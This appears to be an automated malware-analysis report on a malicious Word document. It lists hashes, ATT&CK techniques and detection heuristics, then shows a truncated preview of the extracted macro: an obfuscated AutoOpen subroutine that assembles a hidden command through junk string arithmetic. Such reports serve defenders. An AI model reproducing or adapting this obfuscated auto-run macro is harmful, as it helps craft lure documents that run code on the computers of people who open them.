Office (OLE) malware analysis — malicious · 7b82ee02a8208403

MALICIOUS

Office (OLE)

129.5 KB Created: 2018-09-28 19:50:00 Authoring application: Microsoft Office Word First seen: 2019-02-26

MD5: fe1dd39a2dac801391bbb829795ef918 SHA-1: 8be4968fcc34f46a94f64bff65dff86bed75043d SHA-256: 7b82ee02a8208403c5cc271583c3710eabc5abe9f4a92bbfdd4dc90661289dc1

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

This Office document contains a VBA macro with an AutoOpen subroutine, indicating it is designed to execute automatically upon opening. The macro utilizes a Shell() call, a common technique for launching external processes or downloading additional payloads. The presence of a 'Password-protected archive handoff' heuristic suggests the document may be a lure to trick users into providing passwords or downloading password-protected archives, which often contain malware.

Heuristics 7

ClamAV: Doc.Malware.00536d-6700702-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.00536d-6700702-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE

Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 70122 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	70122 bytes
SHA-256: `506b0856e97e09982a0778cf04f78f6e048b6180b08272de33f4699703248b19`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ikXVjZibrS" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Dim VVVbzf(2) VVVbzf(0) = InStrRev(ZRIHi + ZmoHcTJtVwuNUPZtma + ZsHEoT, uwkkoSI + LFbGzlonMsioWSOOUOVw + EvcjznH) + InStrRev(bVTOaH + BHqDFcGWDuNIqWvqzFq + rSuiLDo, zTpTfwSw + jMdOlMCfRjKLiEMzuSPnYI + zqwXDc) + InStrRev(ZNEJWJMI + pIHPTkwiITFPtEB + chvtfwiY, GGwPTNM + knEuHVHwudEwjHNNj + MWwCMaq) + InStrRev(hWizG + oXirkdwhhCiLAwwChwFJaRL + hjaqIUYq, siYOGfY + BjYbrfqjOEZZkCzLaqbH + OsJjwd) VVVbzf(1) = InStrRev(jrMJF + RfobATzVPshlZbf + njGlkBQ, pqIYBJKn + VvunUFFqwSldCFXDrzmdE + jAKXbl) + InStr(hhstmff + raEMGSiYjotiRqHEfEWjq + XirnYL, mibLdhjz + GtwPCqIajjUtkvzjwL + jfLjk) Dim EzwCjY(2) EzwCjY(0) = InStrRev(BTLQV + UtuXXoSrZTOijFctcXAZo + UZojaun, VGjFsQ + cMKHWYFobKUGKqcO + zYbmT) + InStrRev(WXBLqtwb + zXQblTNvBAZOQvdojV + jjRazs, fISirM + FwYXboIlImwSnTzhrUsdVV + QwlLrL) EzwCjY(1) = InStrRev(kzfwumI + GcFrpPktrtMVCCwMAzvmDE + PwnFL, PsXdbjB + TWVPuzaGwptLmGKUv + hIinJbq) + InStrRev(wfiShiS + zMzOOtDUqUWjhoNhHS + BRqNcWV, zivfmSuo + GzkISOlsVlbbzzYf + zmjWwao) + InStrRev(SsXMRl + XENlcCwNTEpVIaGND + iarXCt, KqjoB + uXDiakkFAzjKXNXCWn + fIQFJ) + InStrRev(hUhuf + ZKkbpXFKRVASzEaASX + izWwT, UGbOo + vzIhawkJvqQUdUmCAGdT + cIzPY) Dim wEfij(1) wEfij(0) = InStr(HcFzPk + RkNpsmSurdoOkFPEii + iYNnXa, szUObSvA + mlnGJHlAsAjZVjQiwKr + kquVPnJO) + InStr(sDbYPF + aGuLYkljiWlGrVSNBWNj + IrZuK, iYRpAZ + jKDirKwNkDwsNWIzQt + YczDi) + InStrRev(qwAES + EuiwsKHEjTSsaCP + iBuibVNt, nwDDSNUR + ARYQjZhwVzpiCAzWX + AHtXFz) + InStrRev(FkOVwNd + BvfvlwwAZQNVvdCkXMUZhT + bZPQYW, bSVPIu + ajQkokNzNFihbUlXabIr + aBjPBH) Dim UVRit(2) UVRit(0) = InStrRev(qzimkH + zhowilSWMLpiTsiUYT + PaGwIu, itQfYPin + DvRhYuWXuCnRsZYbsc + UjvNo) + InStrRev(KuupQHGh + ZnWTqcYjPqJMhmzBdjiS + HsbbpCr, SpCqio + FnzAiNilIfYjrUizBzuNw + ORcwTMKr) UVRit(1) = InStrRev(hjZitpU + ziaUNvpRrLMlzQJ + TOoPpHzJ, HZTmq + zOpXXtzRjXofdEsjtLfGG + JklGOV) + InStrRev(SviRv + zkacVpdbOuHVbRIDjPjwSB + KkNnwO, ufiRij + sUOBjnzjslmIbDVT + bzsPOX) Dim ztVaa(1) ztVaa(0) = InStrRev(nTSHUB + jpiquLshwWqRazLoQXfMj + aFujFNT, aLTsDF + dDJGMWGnMDEEdzLJvArJWVI + AhlLT) + InStrRev(fViOins + PrOwMiTSInmlEAGnNb + NuTqiWD, hHGiu + swSsKDzltKihFzaACsRE + BjEmjH) + InStrRev(SuOIAa + iIlLVaBjjYtYvbuJXswCmA + KiRWfq, JSlta + FziQBWUnWRmEzLLLr + MsCSkS) + InStrRev(jitYsED + rrOizEAaDSZnTqlqO + BsDnitj, wcETA + MiwSKOJBTGECVZFpWa + KUjCWzd) Dim TYDGY(1) TYDGY(0) = InStrRev(nQkJzNGE + wIXCOJMqRWVlVvNThS + KomkJtD, PjROFBFP + iobRfPfmtlvNCcbYDYnw + BDPFt) + InStr(riLsj + ViGlaTWPmsqnPurwM + QjYlh, rkcsTDY + WWlioNGdMDOQJdJNZMo + oXCQuJ) Dim jEYLQQ(2) jEYLQQ(0) = InStrRev(itmOnbo + GfNKRLznzaMnMXYzuCEIi + jaQXtuUn, hcPtZLcT + vhOpUDrjBWjHdiPEfrzVY + JDVqcpdc) + InStrRev(LaDqDiGo + UlPzcNPVvLpwdtnZhGflfNI + cJsjzu, oWOOaH + nWcawQRQuqpzkmBsYDi + HVwub) jEYLQQ(1) = InStrRev(wkprq + RMscRCDYEjuNZPJiYSaRXo + sEJsvnOj, aNqAbzu + zhjPziMTrvUnLbOLoH + ioRvnYrc) + InStrRev(HGFIp + ijvslnzboAVazrBaf + icOXIf, DlBAG + zzdiwjrsoqOHPhY + TdNDHsSl) BFaHamFr (KeyString(hIcsk + LuobGC + 17 + 5 + 45 + AbKclM + iSdwpB) + rMMnVrm + foLprjBT + KeyString(nOcrqVqw + whKZE + 19 + 6 + 52 + pUDIofmG + dmjciFEh) + ZjkwB + doLCODdi + jwjOQSEuWKo + vWwjBvn + PzuuDzA + wlViR) Dim uvWTcw(2) uvWTcw(0) = InStrRev(UjZWEtw + HbiOUSjjwwimJuY + OFSWJZUX, SAILbpQ + sEmtziCFnMJVIBIMEujuC + wZvCwtL) + InStrRev(mbMSrGLP + bwsWPZEifIJjvdRCrTwY + UpqUwiUL, hGCjdP + RocsQzLtNszdXhkqjjzoww + ZalZbdRH) uvWTcw(1) = InStrRev(cYsIUo + nsJYilYFBUzitrCIoQUMQ + TLwaL, fKjdAwz + YQmVrhjWSjSBtNcShai + RwiKj) + InStr(IHNvw + KkdPEscPrzknUhwaaEtzWCl + LoXkPX, DLazkCU + vzlbICVDlQkHjEEqTP + BzvRSd) Dim rlSmPv(2) rlSmPv(0) = InStrRev(rGBEwBF + tKsOrNafIfdkKOQAsJz + ZzCPVQHo, tWhdAX + ImBIGsiikFrkuptKLJqBq + QmpkQc) + InStrRev(rpvQq + niWjdlnloGNjzRwrfGs + cqhCtA, FpWHf + dRwEvKPFZDlRwukCHnD + kQCHraJF) + InStrRev(ONIoC ... (truncated)

SHA-256: 506b0856e97e09982a0778cf04f78f6e048b6180b08272de33f4699703248b19

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ikXVjZibrS"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim VVVbzf(2)
VVVbzf(0) = InStrRev(ZRIHi + ZmoHcTJtVwuNUPZtma + ZsHEoT, uwkkoSI + LFbGzlonMsioWSOOUOVw + EvcjznH) + InStrRev(bVTOaH + BHqDFcGWDuNIqWvqzFq + rSuiLDo, zTpTfwSw + jMdOlMCfRjKLiEMzuSPnYI + zqwXDc) + InStrRev(ZNEJWJMI + pIHPTkwiITFPtEB + chvtfwiY, GGwPTNM + knEuHVHwudEwjHNNj + MWwCMaq) + InStrRev(hWizG + oXirkdwhhCiLAwwChwFJaRL + hjaqIUYq, siYOGfY + BjYbrfqjOEZZkCzLaqbH + OsJjwd)
VVVbzf(1) = InStrRev(jrMJF + RfobATzVPshlZbf + njGlkBQ, pqIYBJKn + VvunUFFqwSldCFXDrzmdE + jAKXbl) + InStr(hhstmff + raEMGSiYjotiRqHEfEWjq + XirnYL, mibLdhjz + GtwPCqIajjUtkvzjwL + jfLjk)
   Dim EzwCjY(2)
EzwCjY(0) = InStrRev(BTLQV + UtuXXoSrZTOijFctcXAZo + UZojaun, VGjFsQ + cMKHWYFobKUGKqcO + zYbmT) + InStrRev(WXBLqtwb + zXQblTNvBAZOQvdojV + jjRazs, fISirM + FwYXboIlImwSnTzhrUsdVV + QwlLrL)
EzwCjY(1) = InStrRev(kzfwumI + GcFrpPktrtMVCCwMAzvmDE + PwnFL, PsXdbjB + TWVPuzaGwptLmGKUv + hIinJbq) + InStrRev(wfiShiS + zMzOOtDUqUWjhoNhHS + BRqNcWV, zivfmSuo + GzkISOlsVlbbzzYf + zmjWwao) + InStrRev(SsXMRl + XENlcCwNTEpVIaGND + iarXCt, KqjoB + uXDiakkFAzjKXNXCWn + fIQFJ) + InStrRev(hUhuf + ZKkbpXFKRVASzEaASX + izWwT, UGbOo + vzIhawkJvqQUdUmCAGdT + cIzPY)
   Dim wEfij(1)
wEfij(0) = InStr(HcFzPk + RkNpsmSurdoOkFPEii + iYNnXa, szUObSvA + mlnGJHlAsAjZVjQiwKr + kquVPnJO) + InStr(sDbYPF + aGuLYkljiWlGrVSNBWNj + IrZuK, iYRpAZ + jKDirKwNkDwsNWIzQt + YczDi) + InStrRev(qwAES + EuiwsKHEjTSsaCP + iBuibVNt, nwDDSNUR + ARYQjZhwVzpiCAzWX + AHtXFz) + InStrRev(FkOVwNd + BvfvlwwAZQNVvdCkXMUZhT + bZPQYW, bSVPIu + ajQkokNzNFihbUlXabIr + aBjPBH)
   Dim UVRit(2)
UVRit(0) = InStrRev(qzimkH + zhowilSWMLpiTsiUYT + PaGwIu, itQfYPin + DvRhYuWXuCnRsZYbsc + UjvNo) + InStrRev(KuupQHGh + ZnWTqcYjPqJMhmzBdjiS + HsbbpCr, SpCqio + FnzAiNilIfYjrUizBzuNw + ORcwTMKr)
UVRit(1) = InStrRev(hjZitpU + ziaUNvpRrLMlzQJ + TOoPpHzJ, HZTmq + zOpXXtzRjXofdEsjtLfGG + JklGOV) + InStrRev(SviRv + zkacVpdbOuHVbRIDjPjwSB + KkNnwO, ufiRij + sUOBjnzjslmIbDVT + bzsPOX)
   Dim ztVaa(1)
ztVaa(0) = InStrRev(nTSHUB + jpiquLshwWqRazLoQXfMj + aFujFNT, aLTsDF + dDJGMWGnMDEEdzLJvArJWVI + AhlLT) + InStrRev(fViOins + PrOwMiTSInmlEAGnNb + NuTqiWD, hHGiu + swSsKDzltKihFzaACsRE + BjEmjH) + InStrRev(SuOIAa + iIlLVaBjjYtYvbuJXswCmA + KiRWfq, JSlta + FziQBWUnWRmEzLLLr + MsCSkS) + InStrRev(jitYsED + rrOizEAaDSZnTqlqO + BsDnitj, wcETA + MiwSKOJBTGECVZFpWa + KUjCWzd)
   Dim TYDGY(1)
TYDGY(0) = InStrRev(nQkJzNGE + wIXCOJMqRWVlVvNThS + KomkJtD, PjROFBFP + iobRfPfmtlvNCcbYDYnw + BDPFt) + InStr(riLsj + ViGlaTWPmsqnPurwM + QjYlh, rkcsTDY + WWlioNGdMDOQJdJNZMo + oXCQuJ)
   Dim jEYLQQ(2)
jEYLQQ(0) = InStrRev(itmOnbo + GfNKRLznzaMnMXYzuCEIi + jaQXtuUn, hcPtZLcT + vhOpUDrjBWjHdiPEfrzVY + JDVqcpdc) + InStrRev(LaDqDiGo + UlPzcNPVvLpwdtnZhGflfNI + cJsjzu, oWOOaH + nWcawQRQuqpzkmBsYDi + HVwub)
jEYLQQ(1) = InStrRev(wkprq + RMscRCDYEjuNZPJiYSaRXo + sEJsvnOj, aNqAbzu + zhjPziMTrvUnLbOLoH + ioRvnYrc) + InStrRev(HGFIp + ijvslnzboAVazrBaf + icOXIf, DlBAG + zzdiwjrsoqOHPhY + TdNDHsSl)
BFaHamFr (KeyString(hIcsk + LuobGC + 17 + 5 + 45 + AbKclM + iSdwpB) + rMMnVrm + foLprjBT + KeyString(nOcrqVqw + whKZE + 19 + 6 + 52 + pUDIofmG + dmjciFEh) + ZjkwB + doLCODdi + jwjOQSEuWKo + vWwjBvn + PzuuDzA + wlViR)
   Dim uvWTcw(2)
uvWTcw(0) = InStrRev(UjZWEtw + HbiOUSjjwwimJuY + OFSWJZUX, SAILbpQ + sEmtziCFnMJVIBIMEujuC + wZvCwtL) + InStrRev(mbMSrGLP + bwsWPZEifIJjvdRCrTwY + UpqUwiUL, hGCjdP + RocsQzLtNszdXhkqjjzoww + ZalZbdRH)
uvWTcw(1) = InStrRev(cYsIUo + nsJYilYFBUzitrCIoQUMQ + TLwaL, fKjdAwz + YQmVrhjWSjSBtNcShai + RwiKj) + InStr(IHNvw + KkdPEscPrzknUhwaaEtzWCl + LoXkPX, DLazkCU + vzlbICVDlQkHjEEqTP + BzvRSd)
   Dim rlSmPv(2)
rlSmPv(0) = InStrRev(rGBEwBF + tKsOrNafIfdkKOQAsJz + ZzCPVQHo, tWhdAX + ImBIGsiikFrkuptKLJqBq + QmpkQc) + InStrRev(rpvQq + niWjdlnloGNjzRwrfGs + cqhCtA, FpWHf + dRwEvKPFZDlRwukCHnD + kQCHraJF) + InStrRev(ONIoC
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.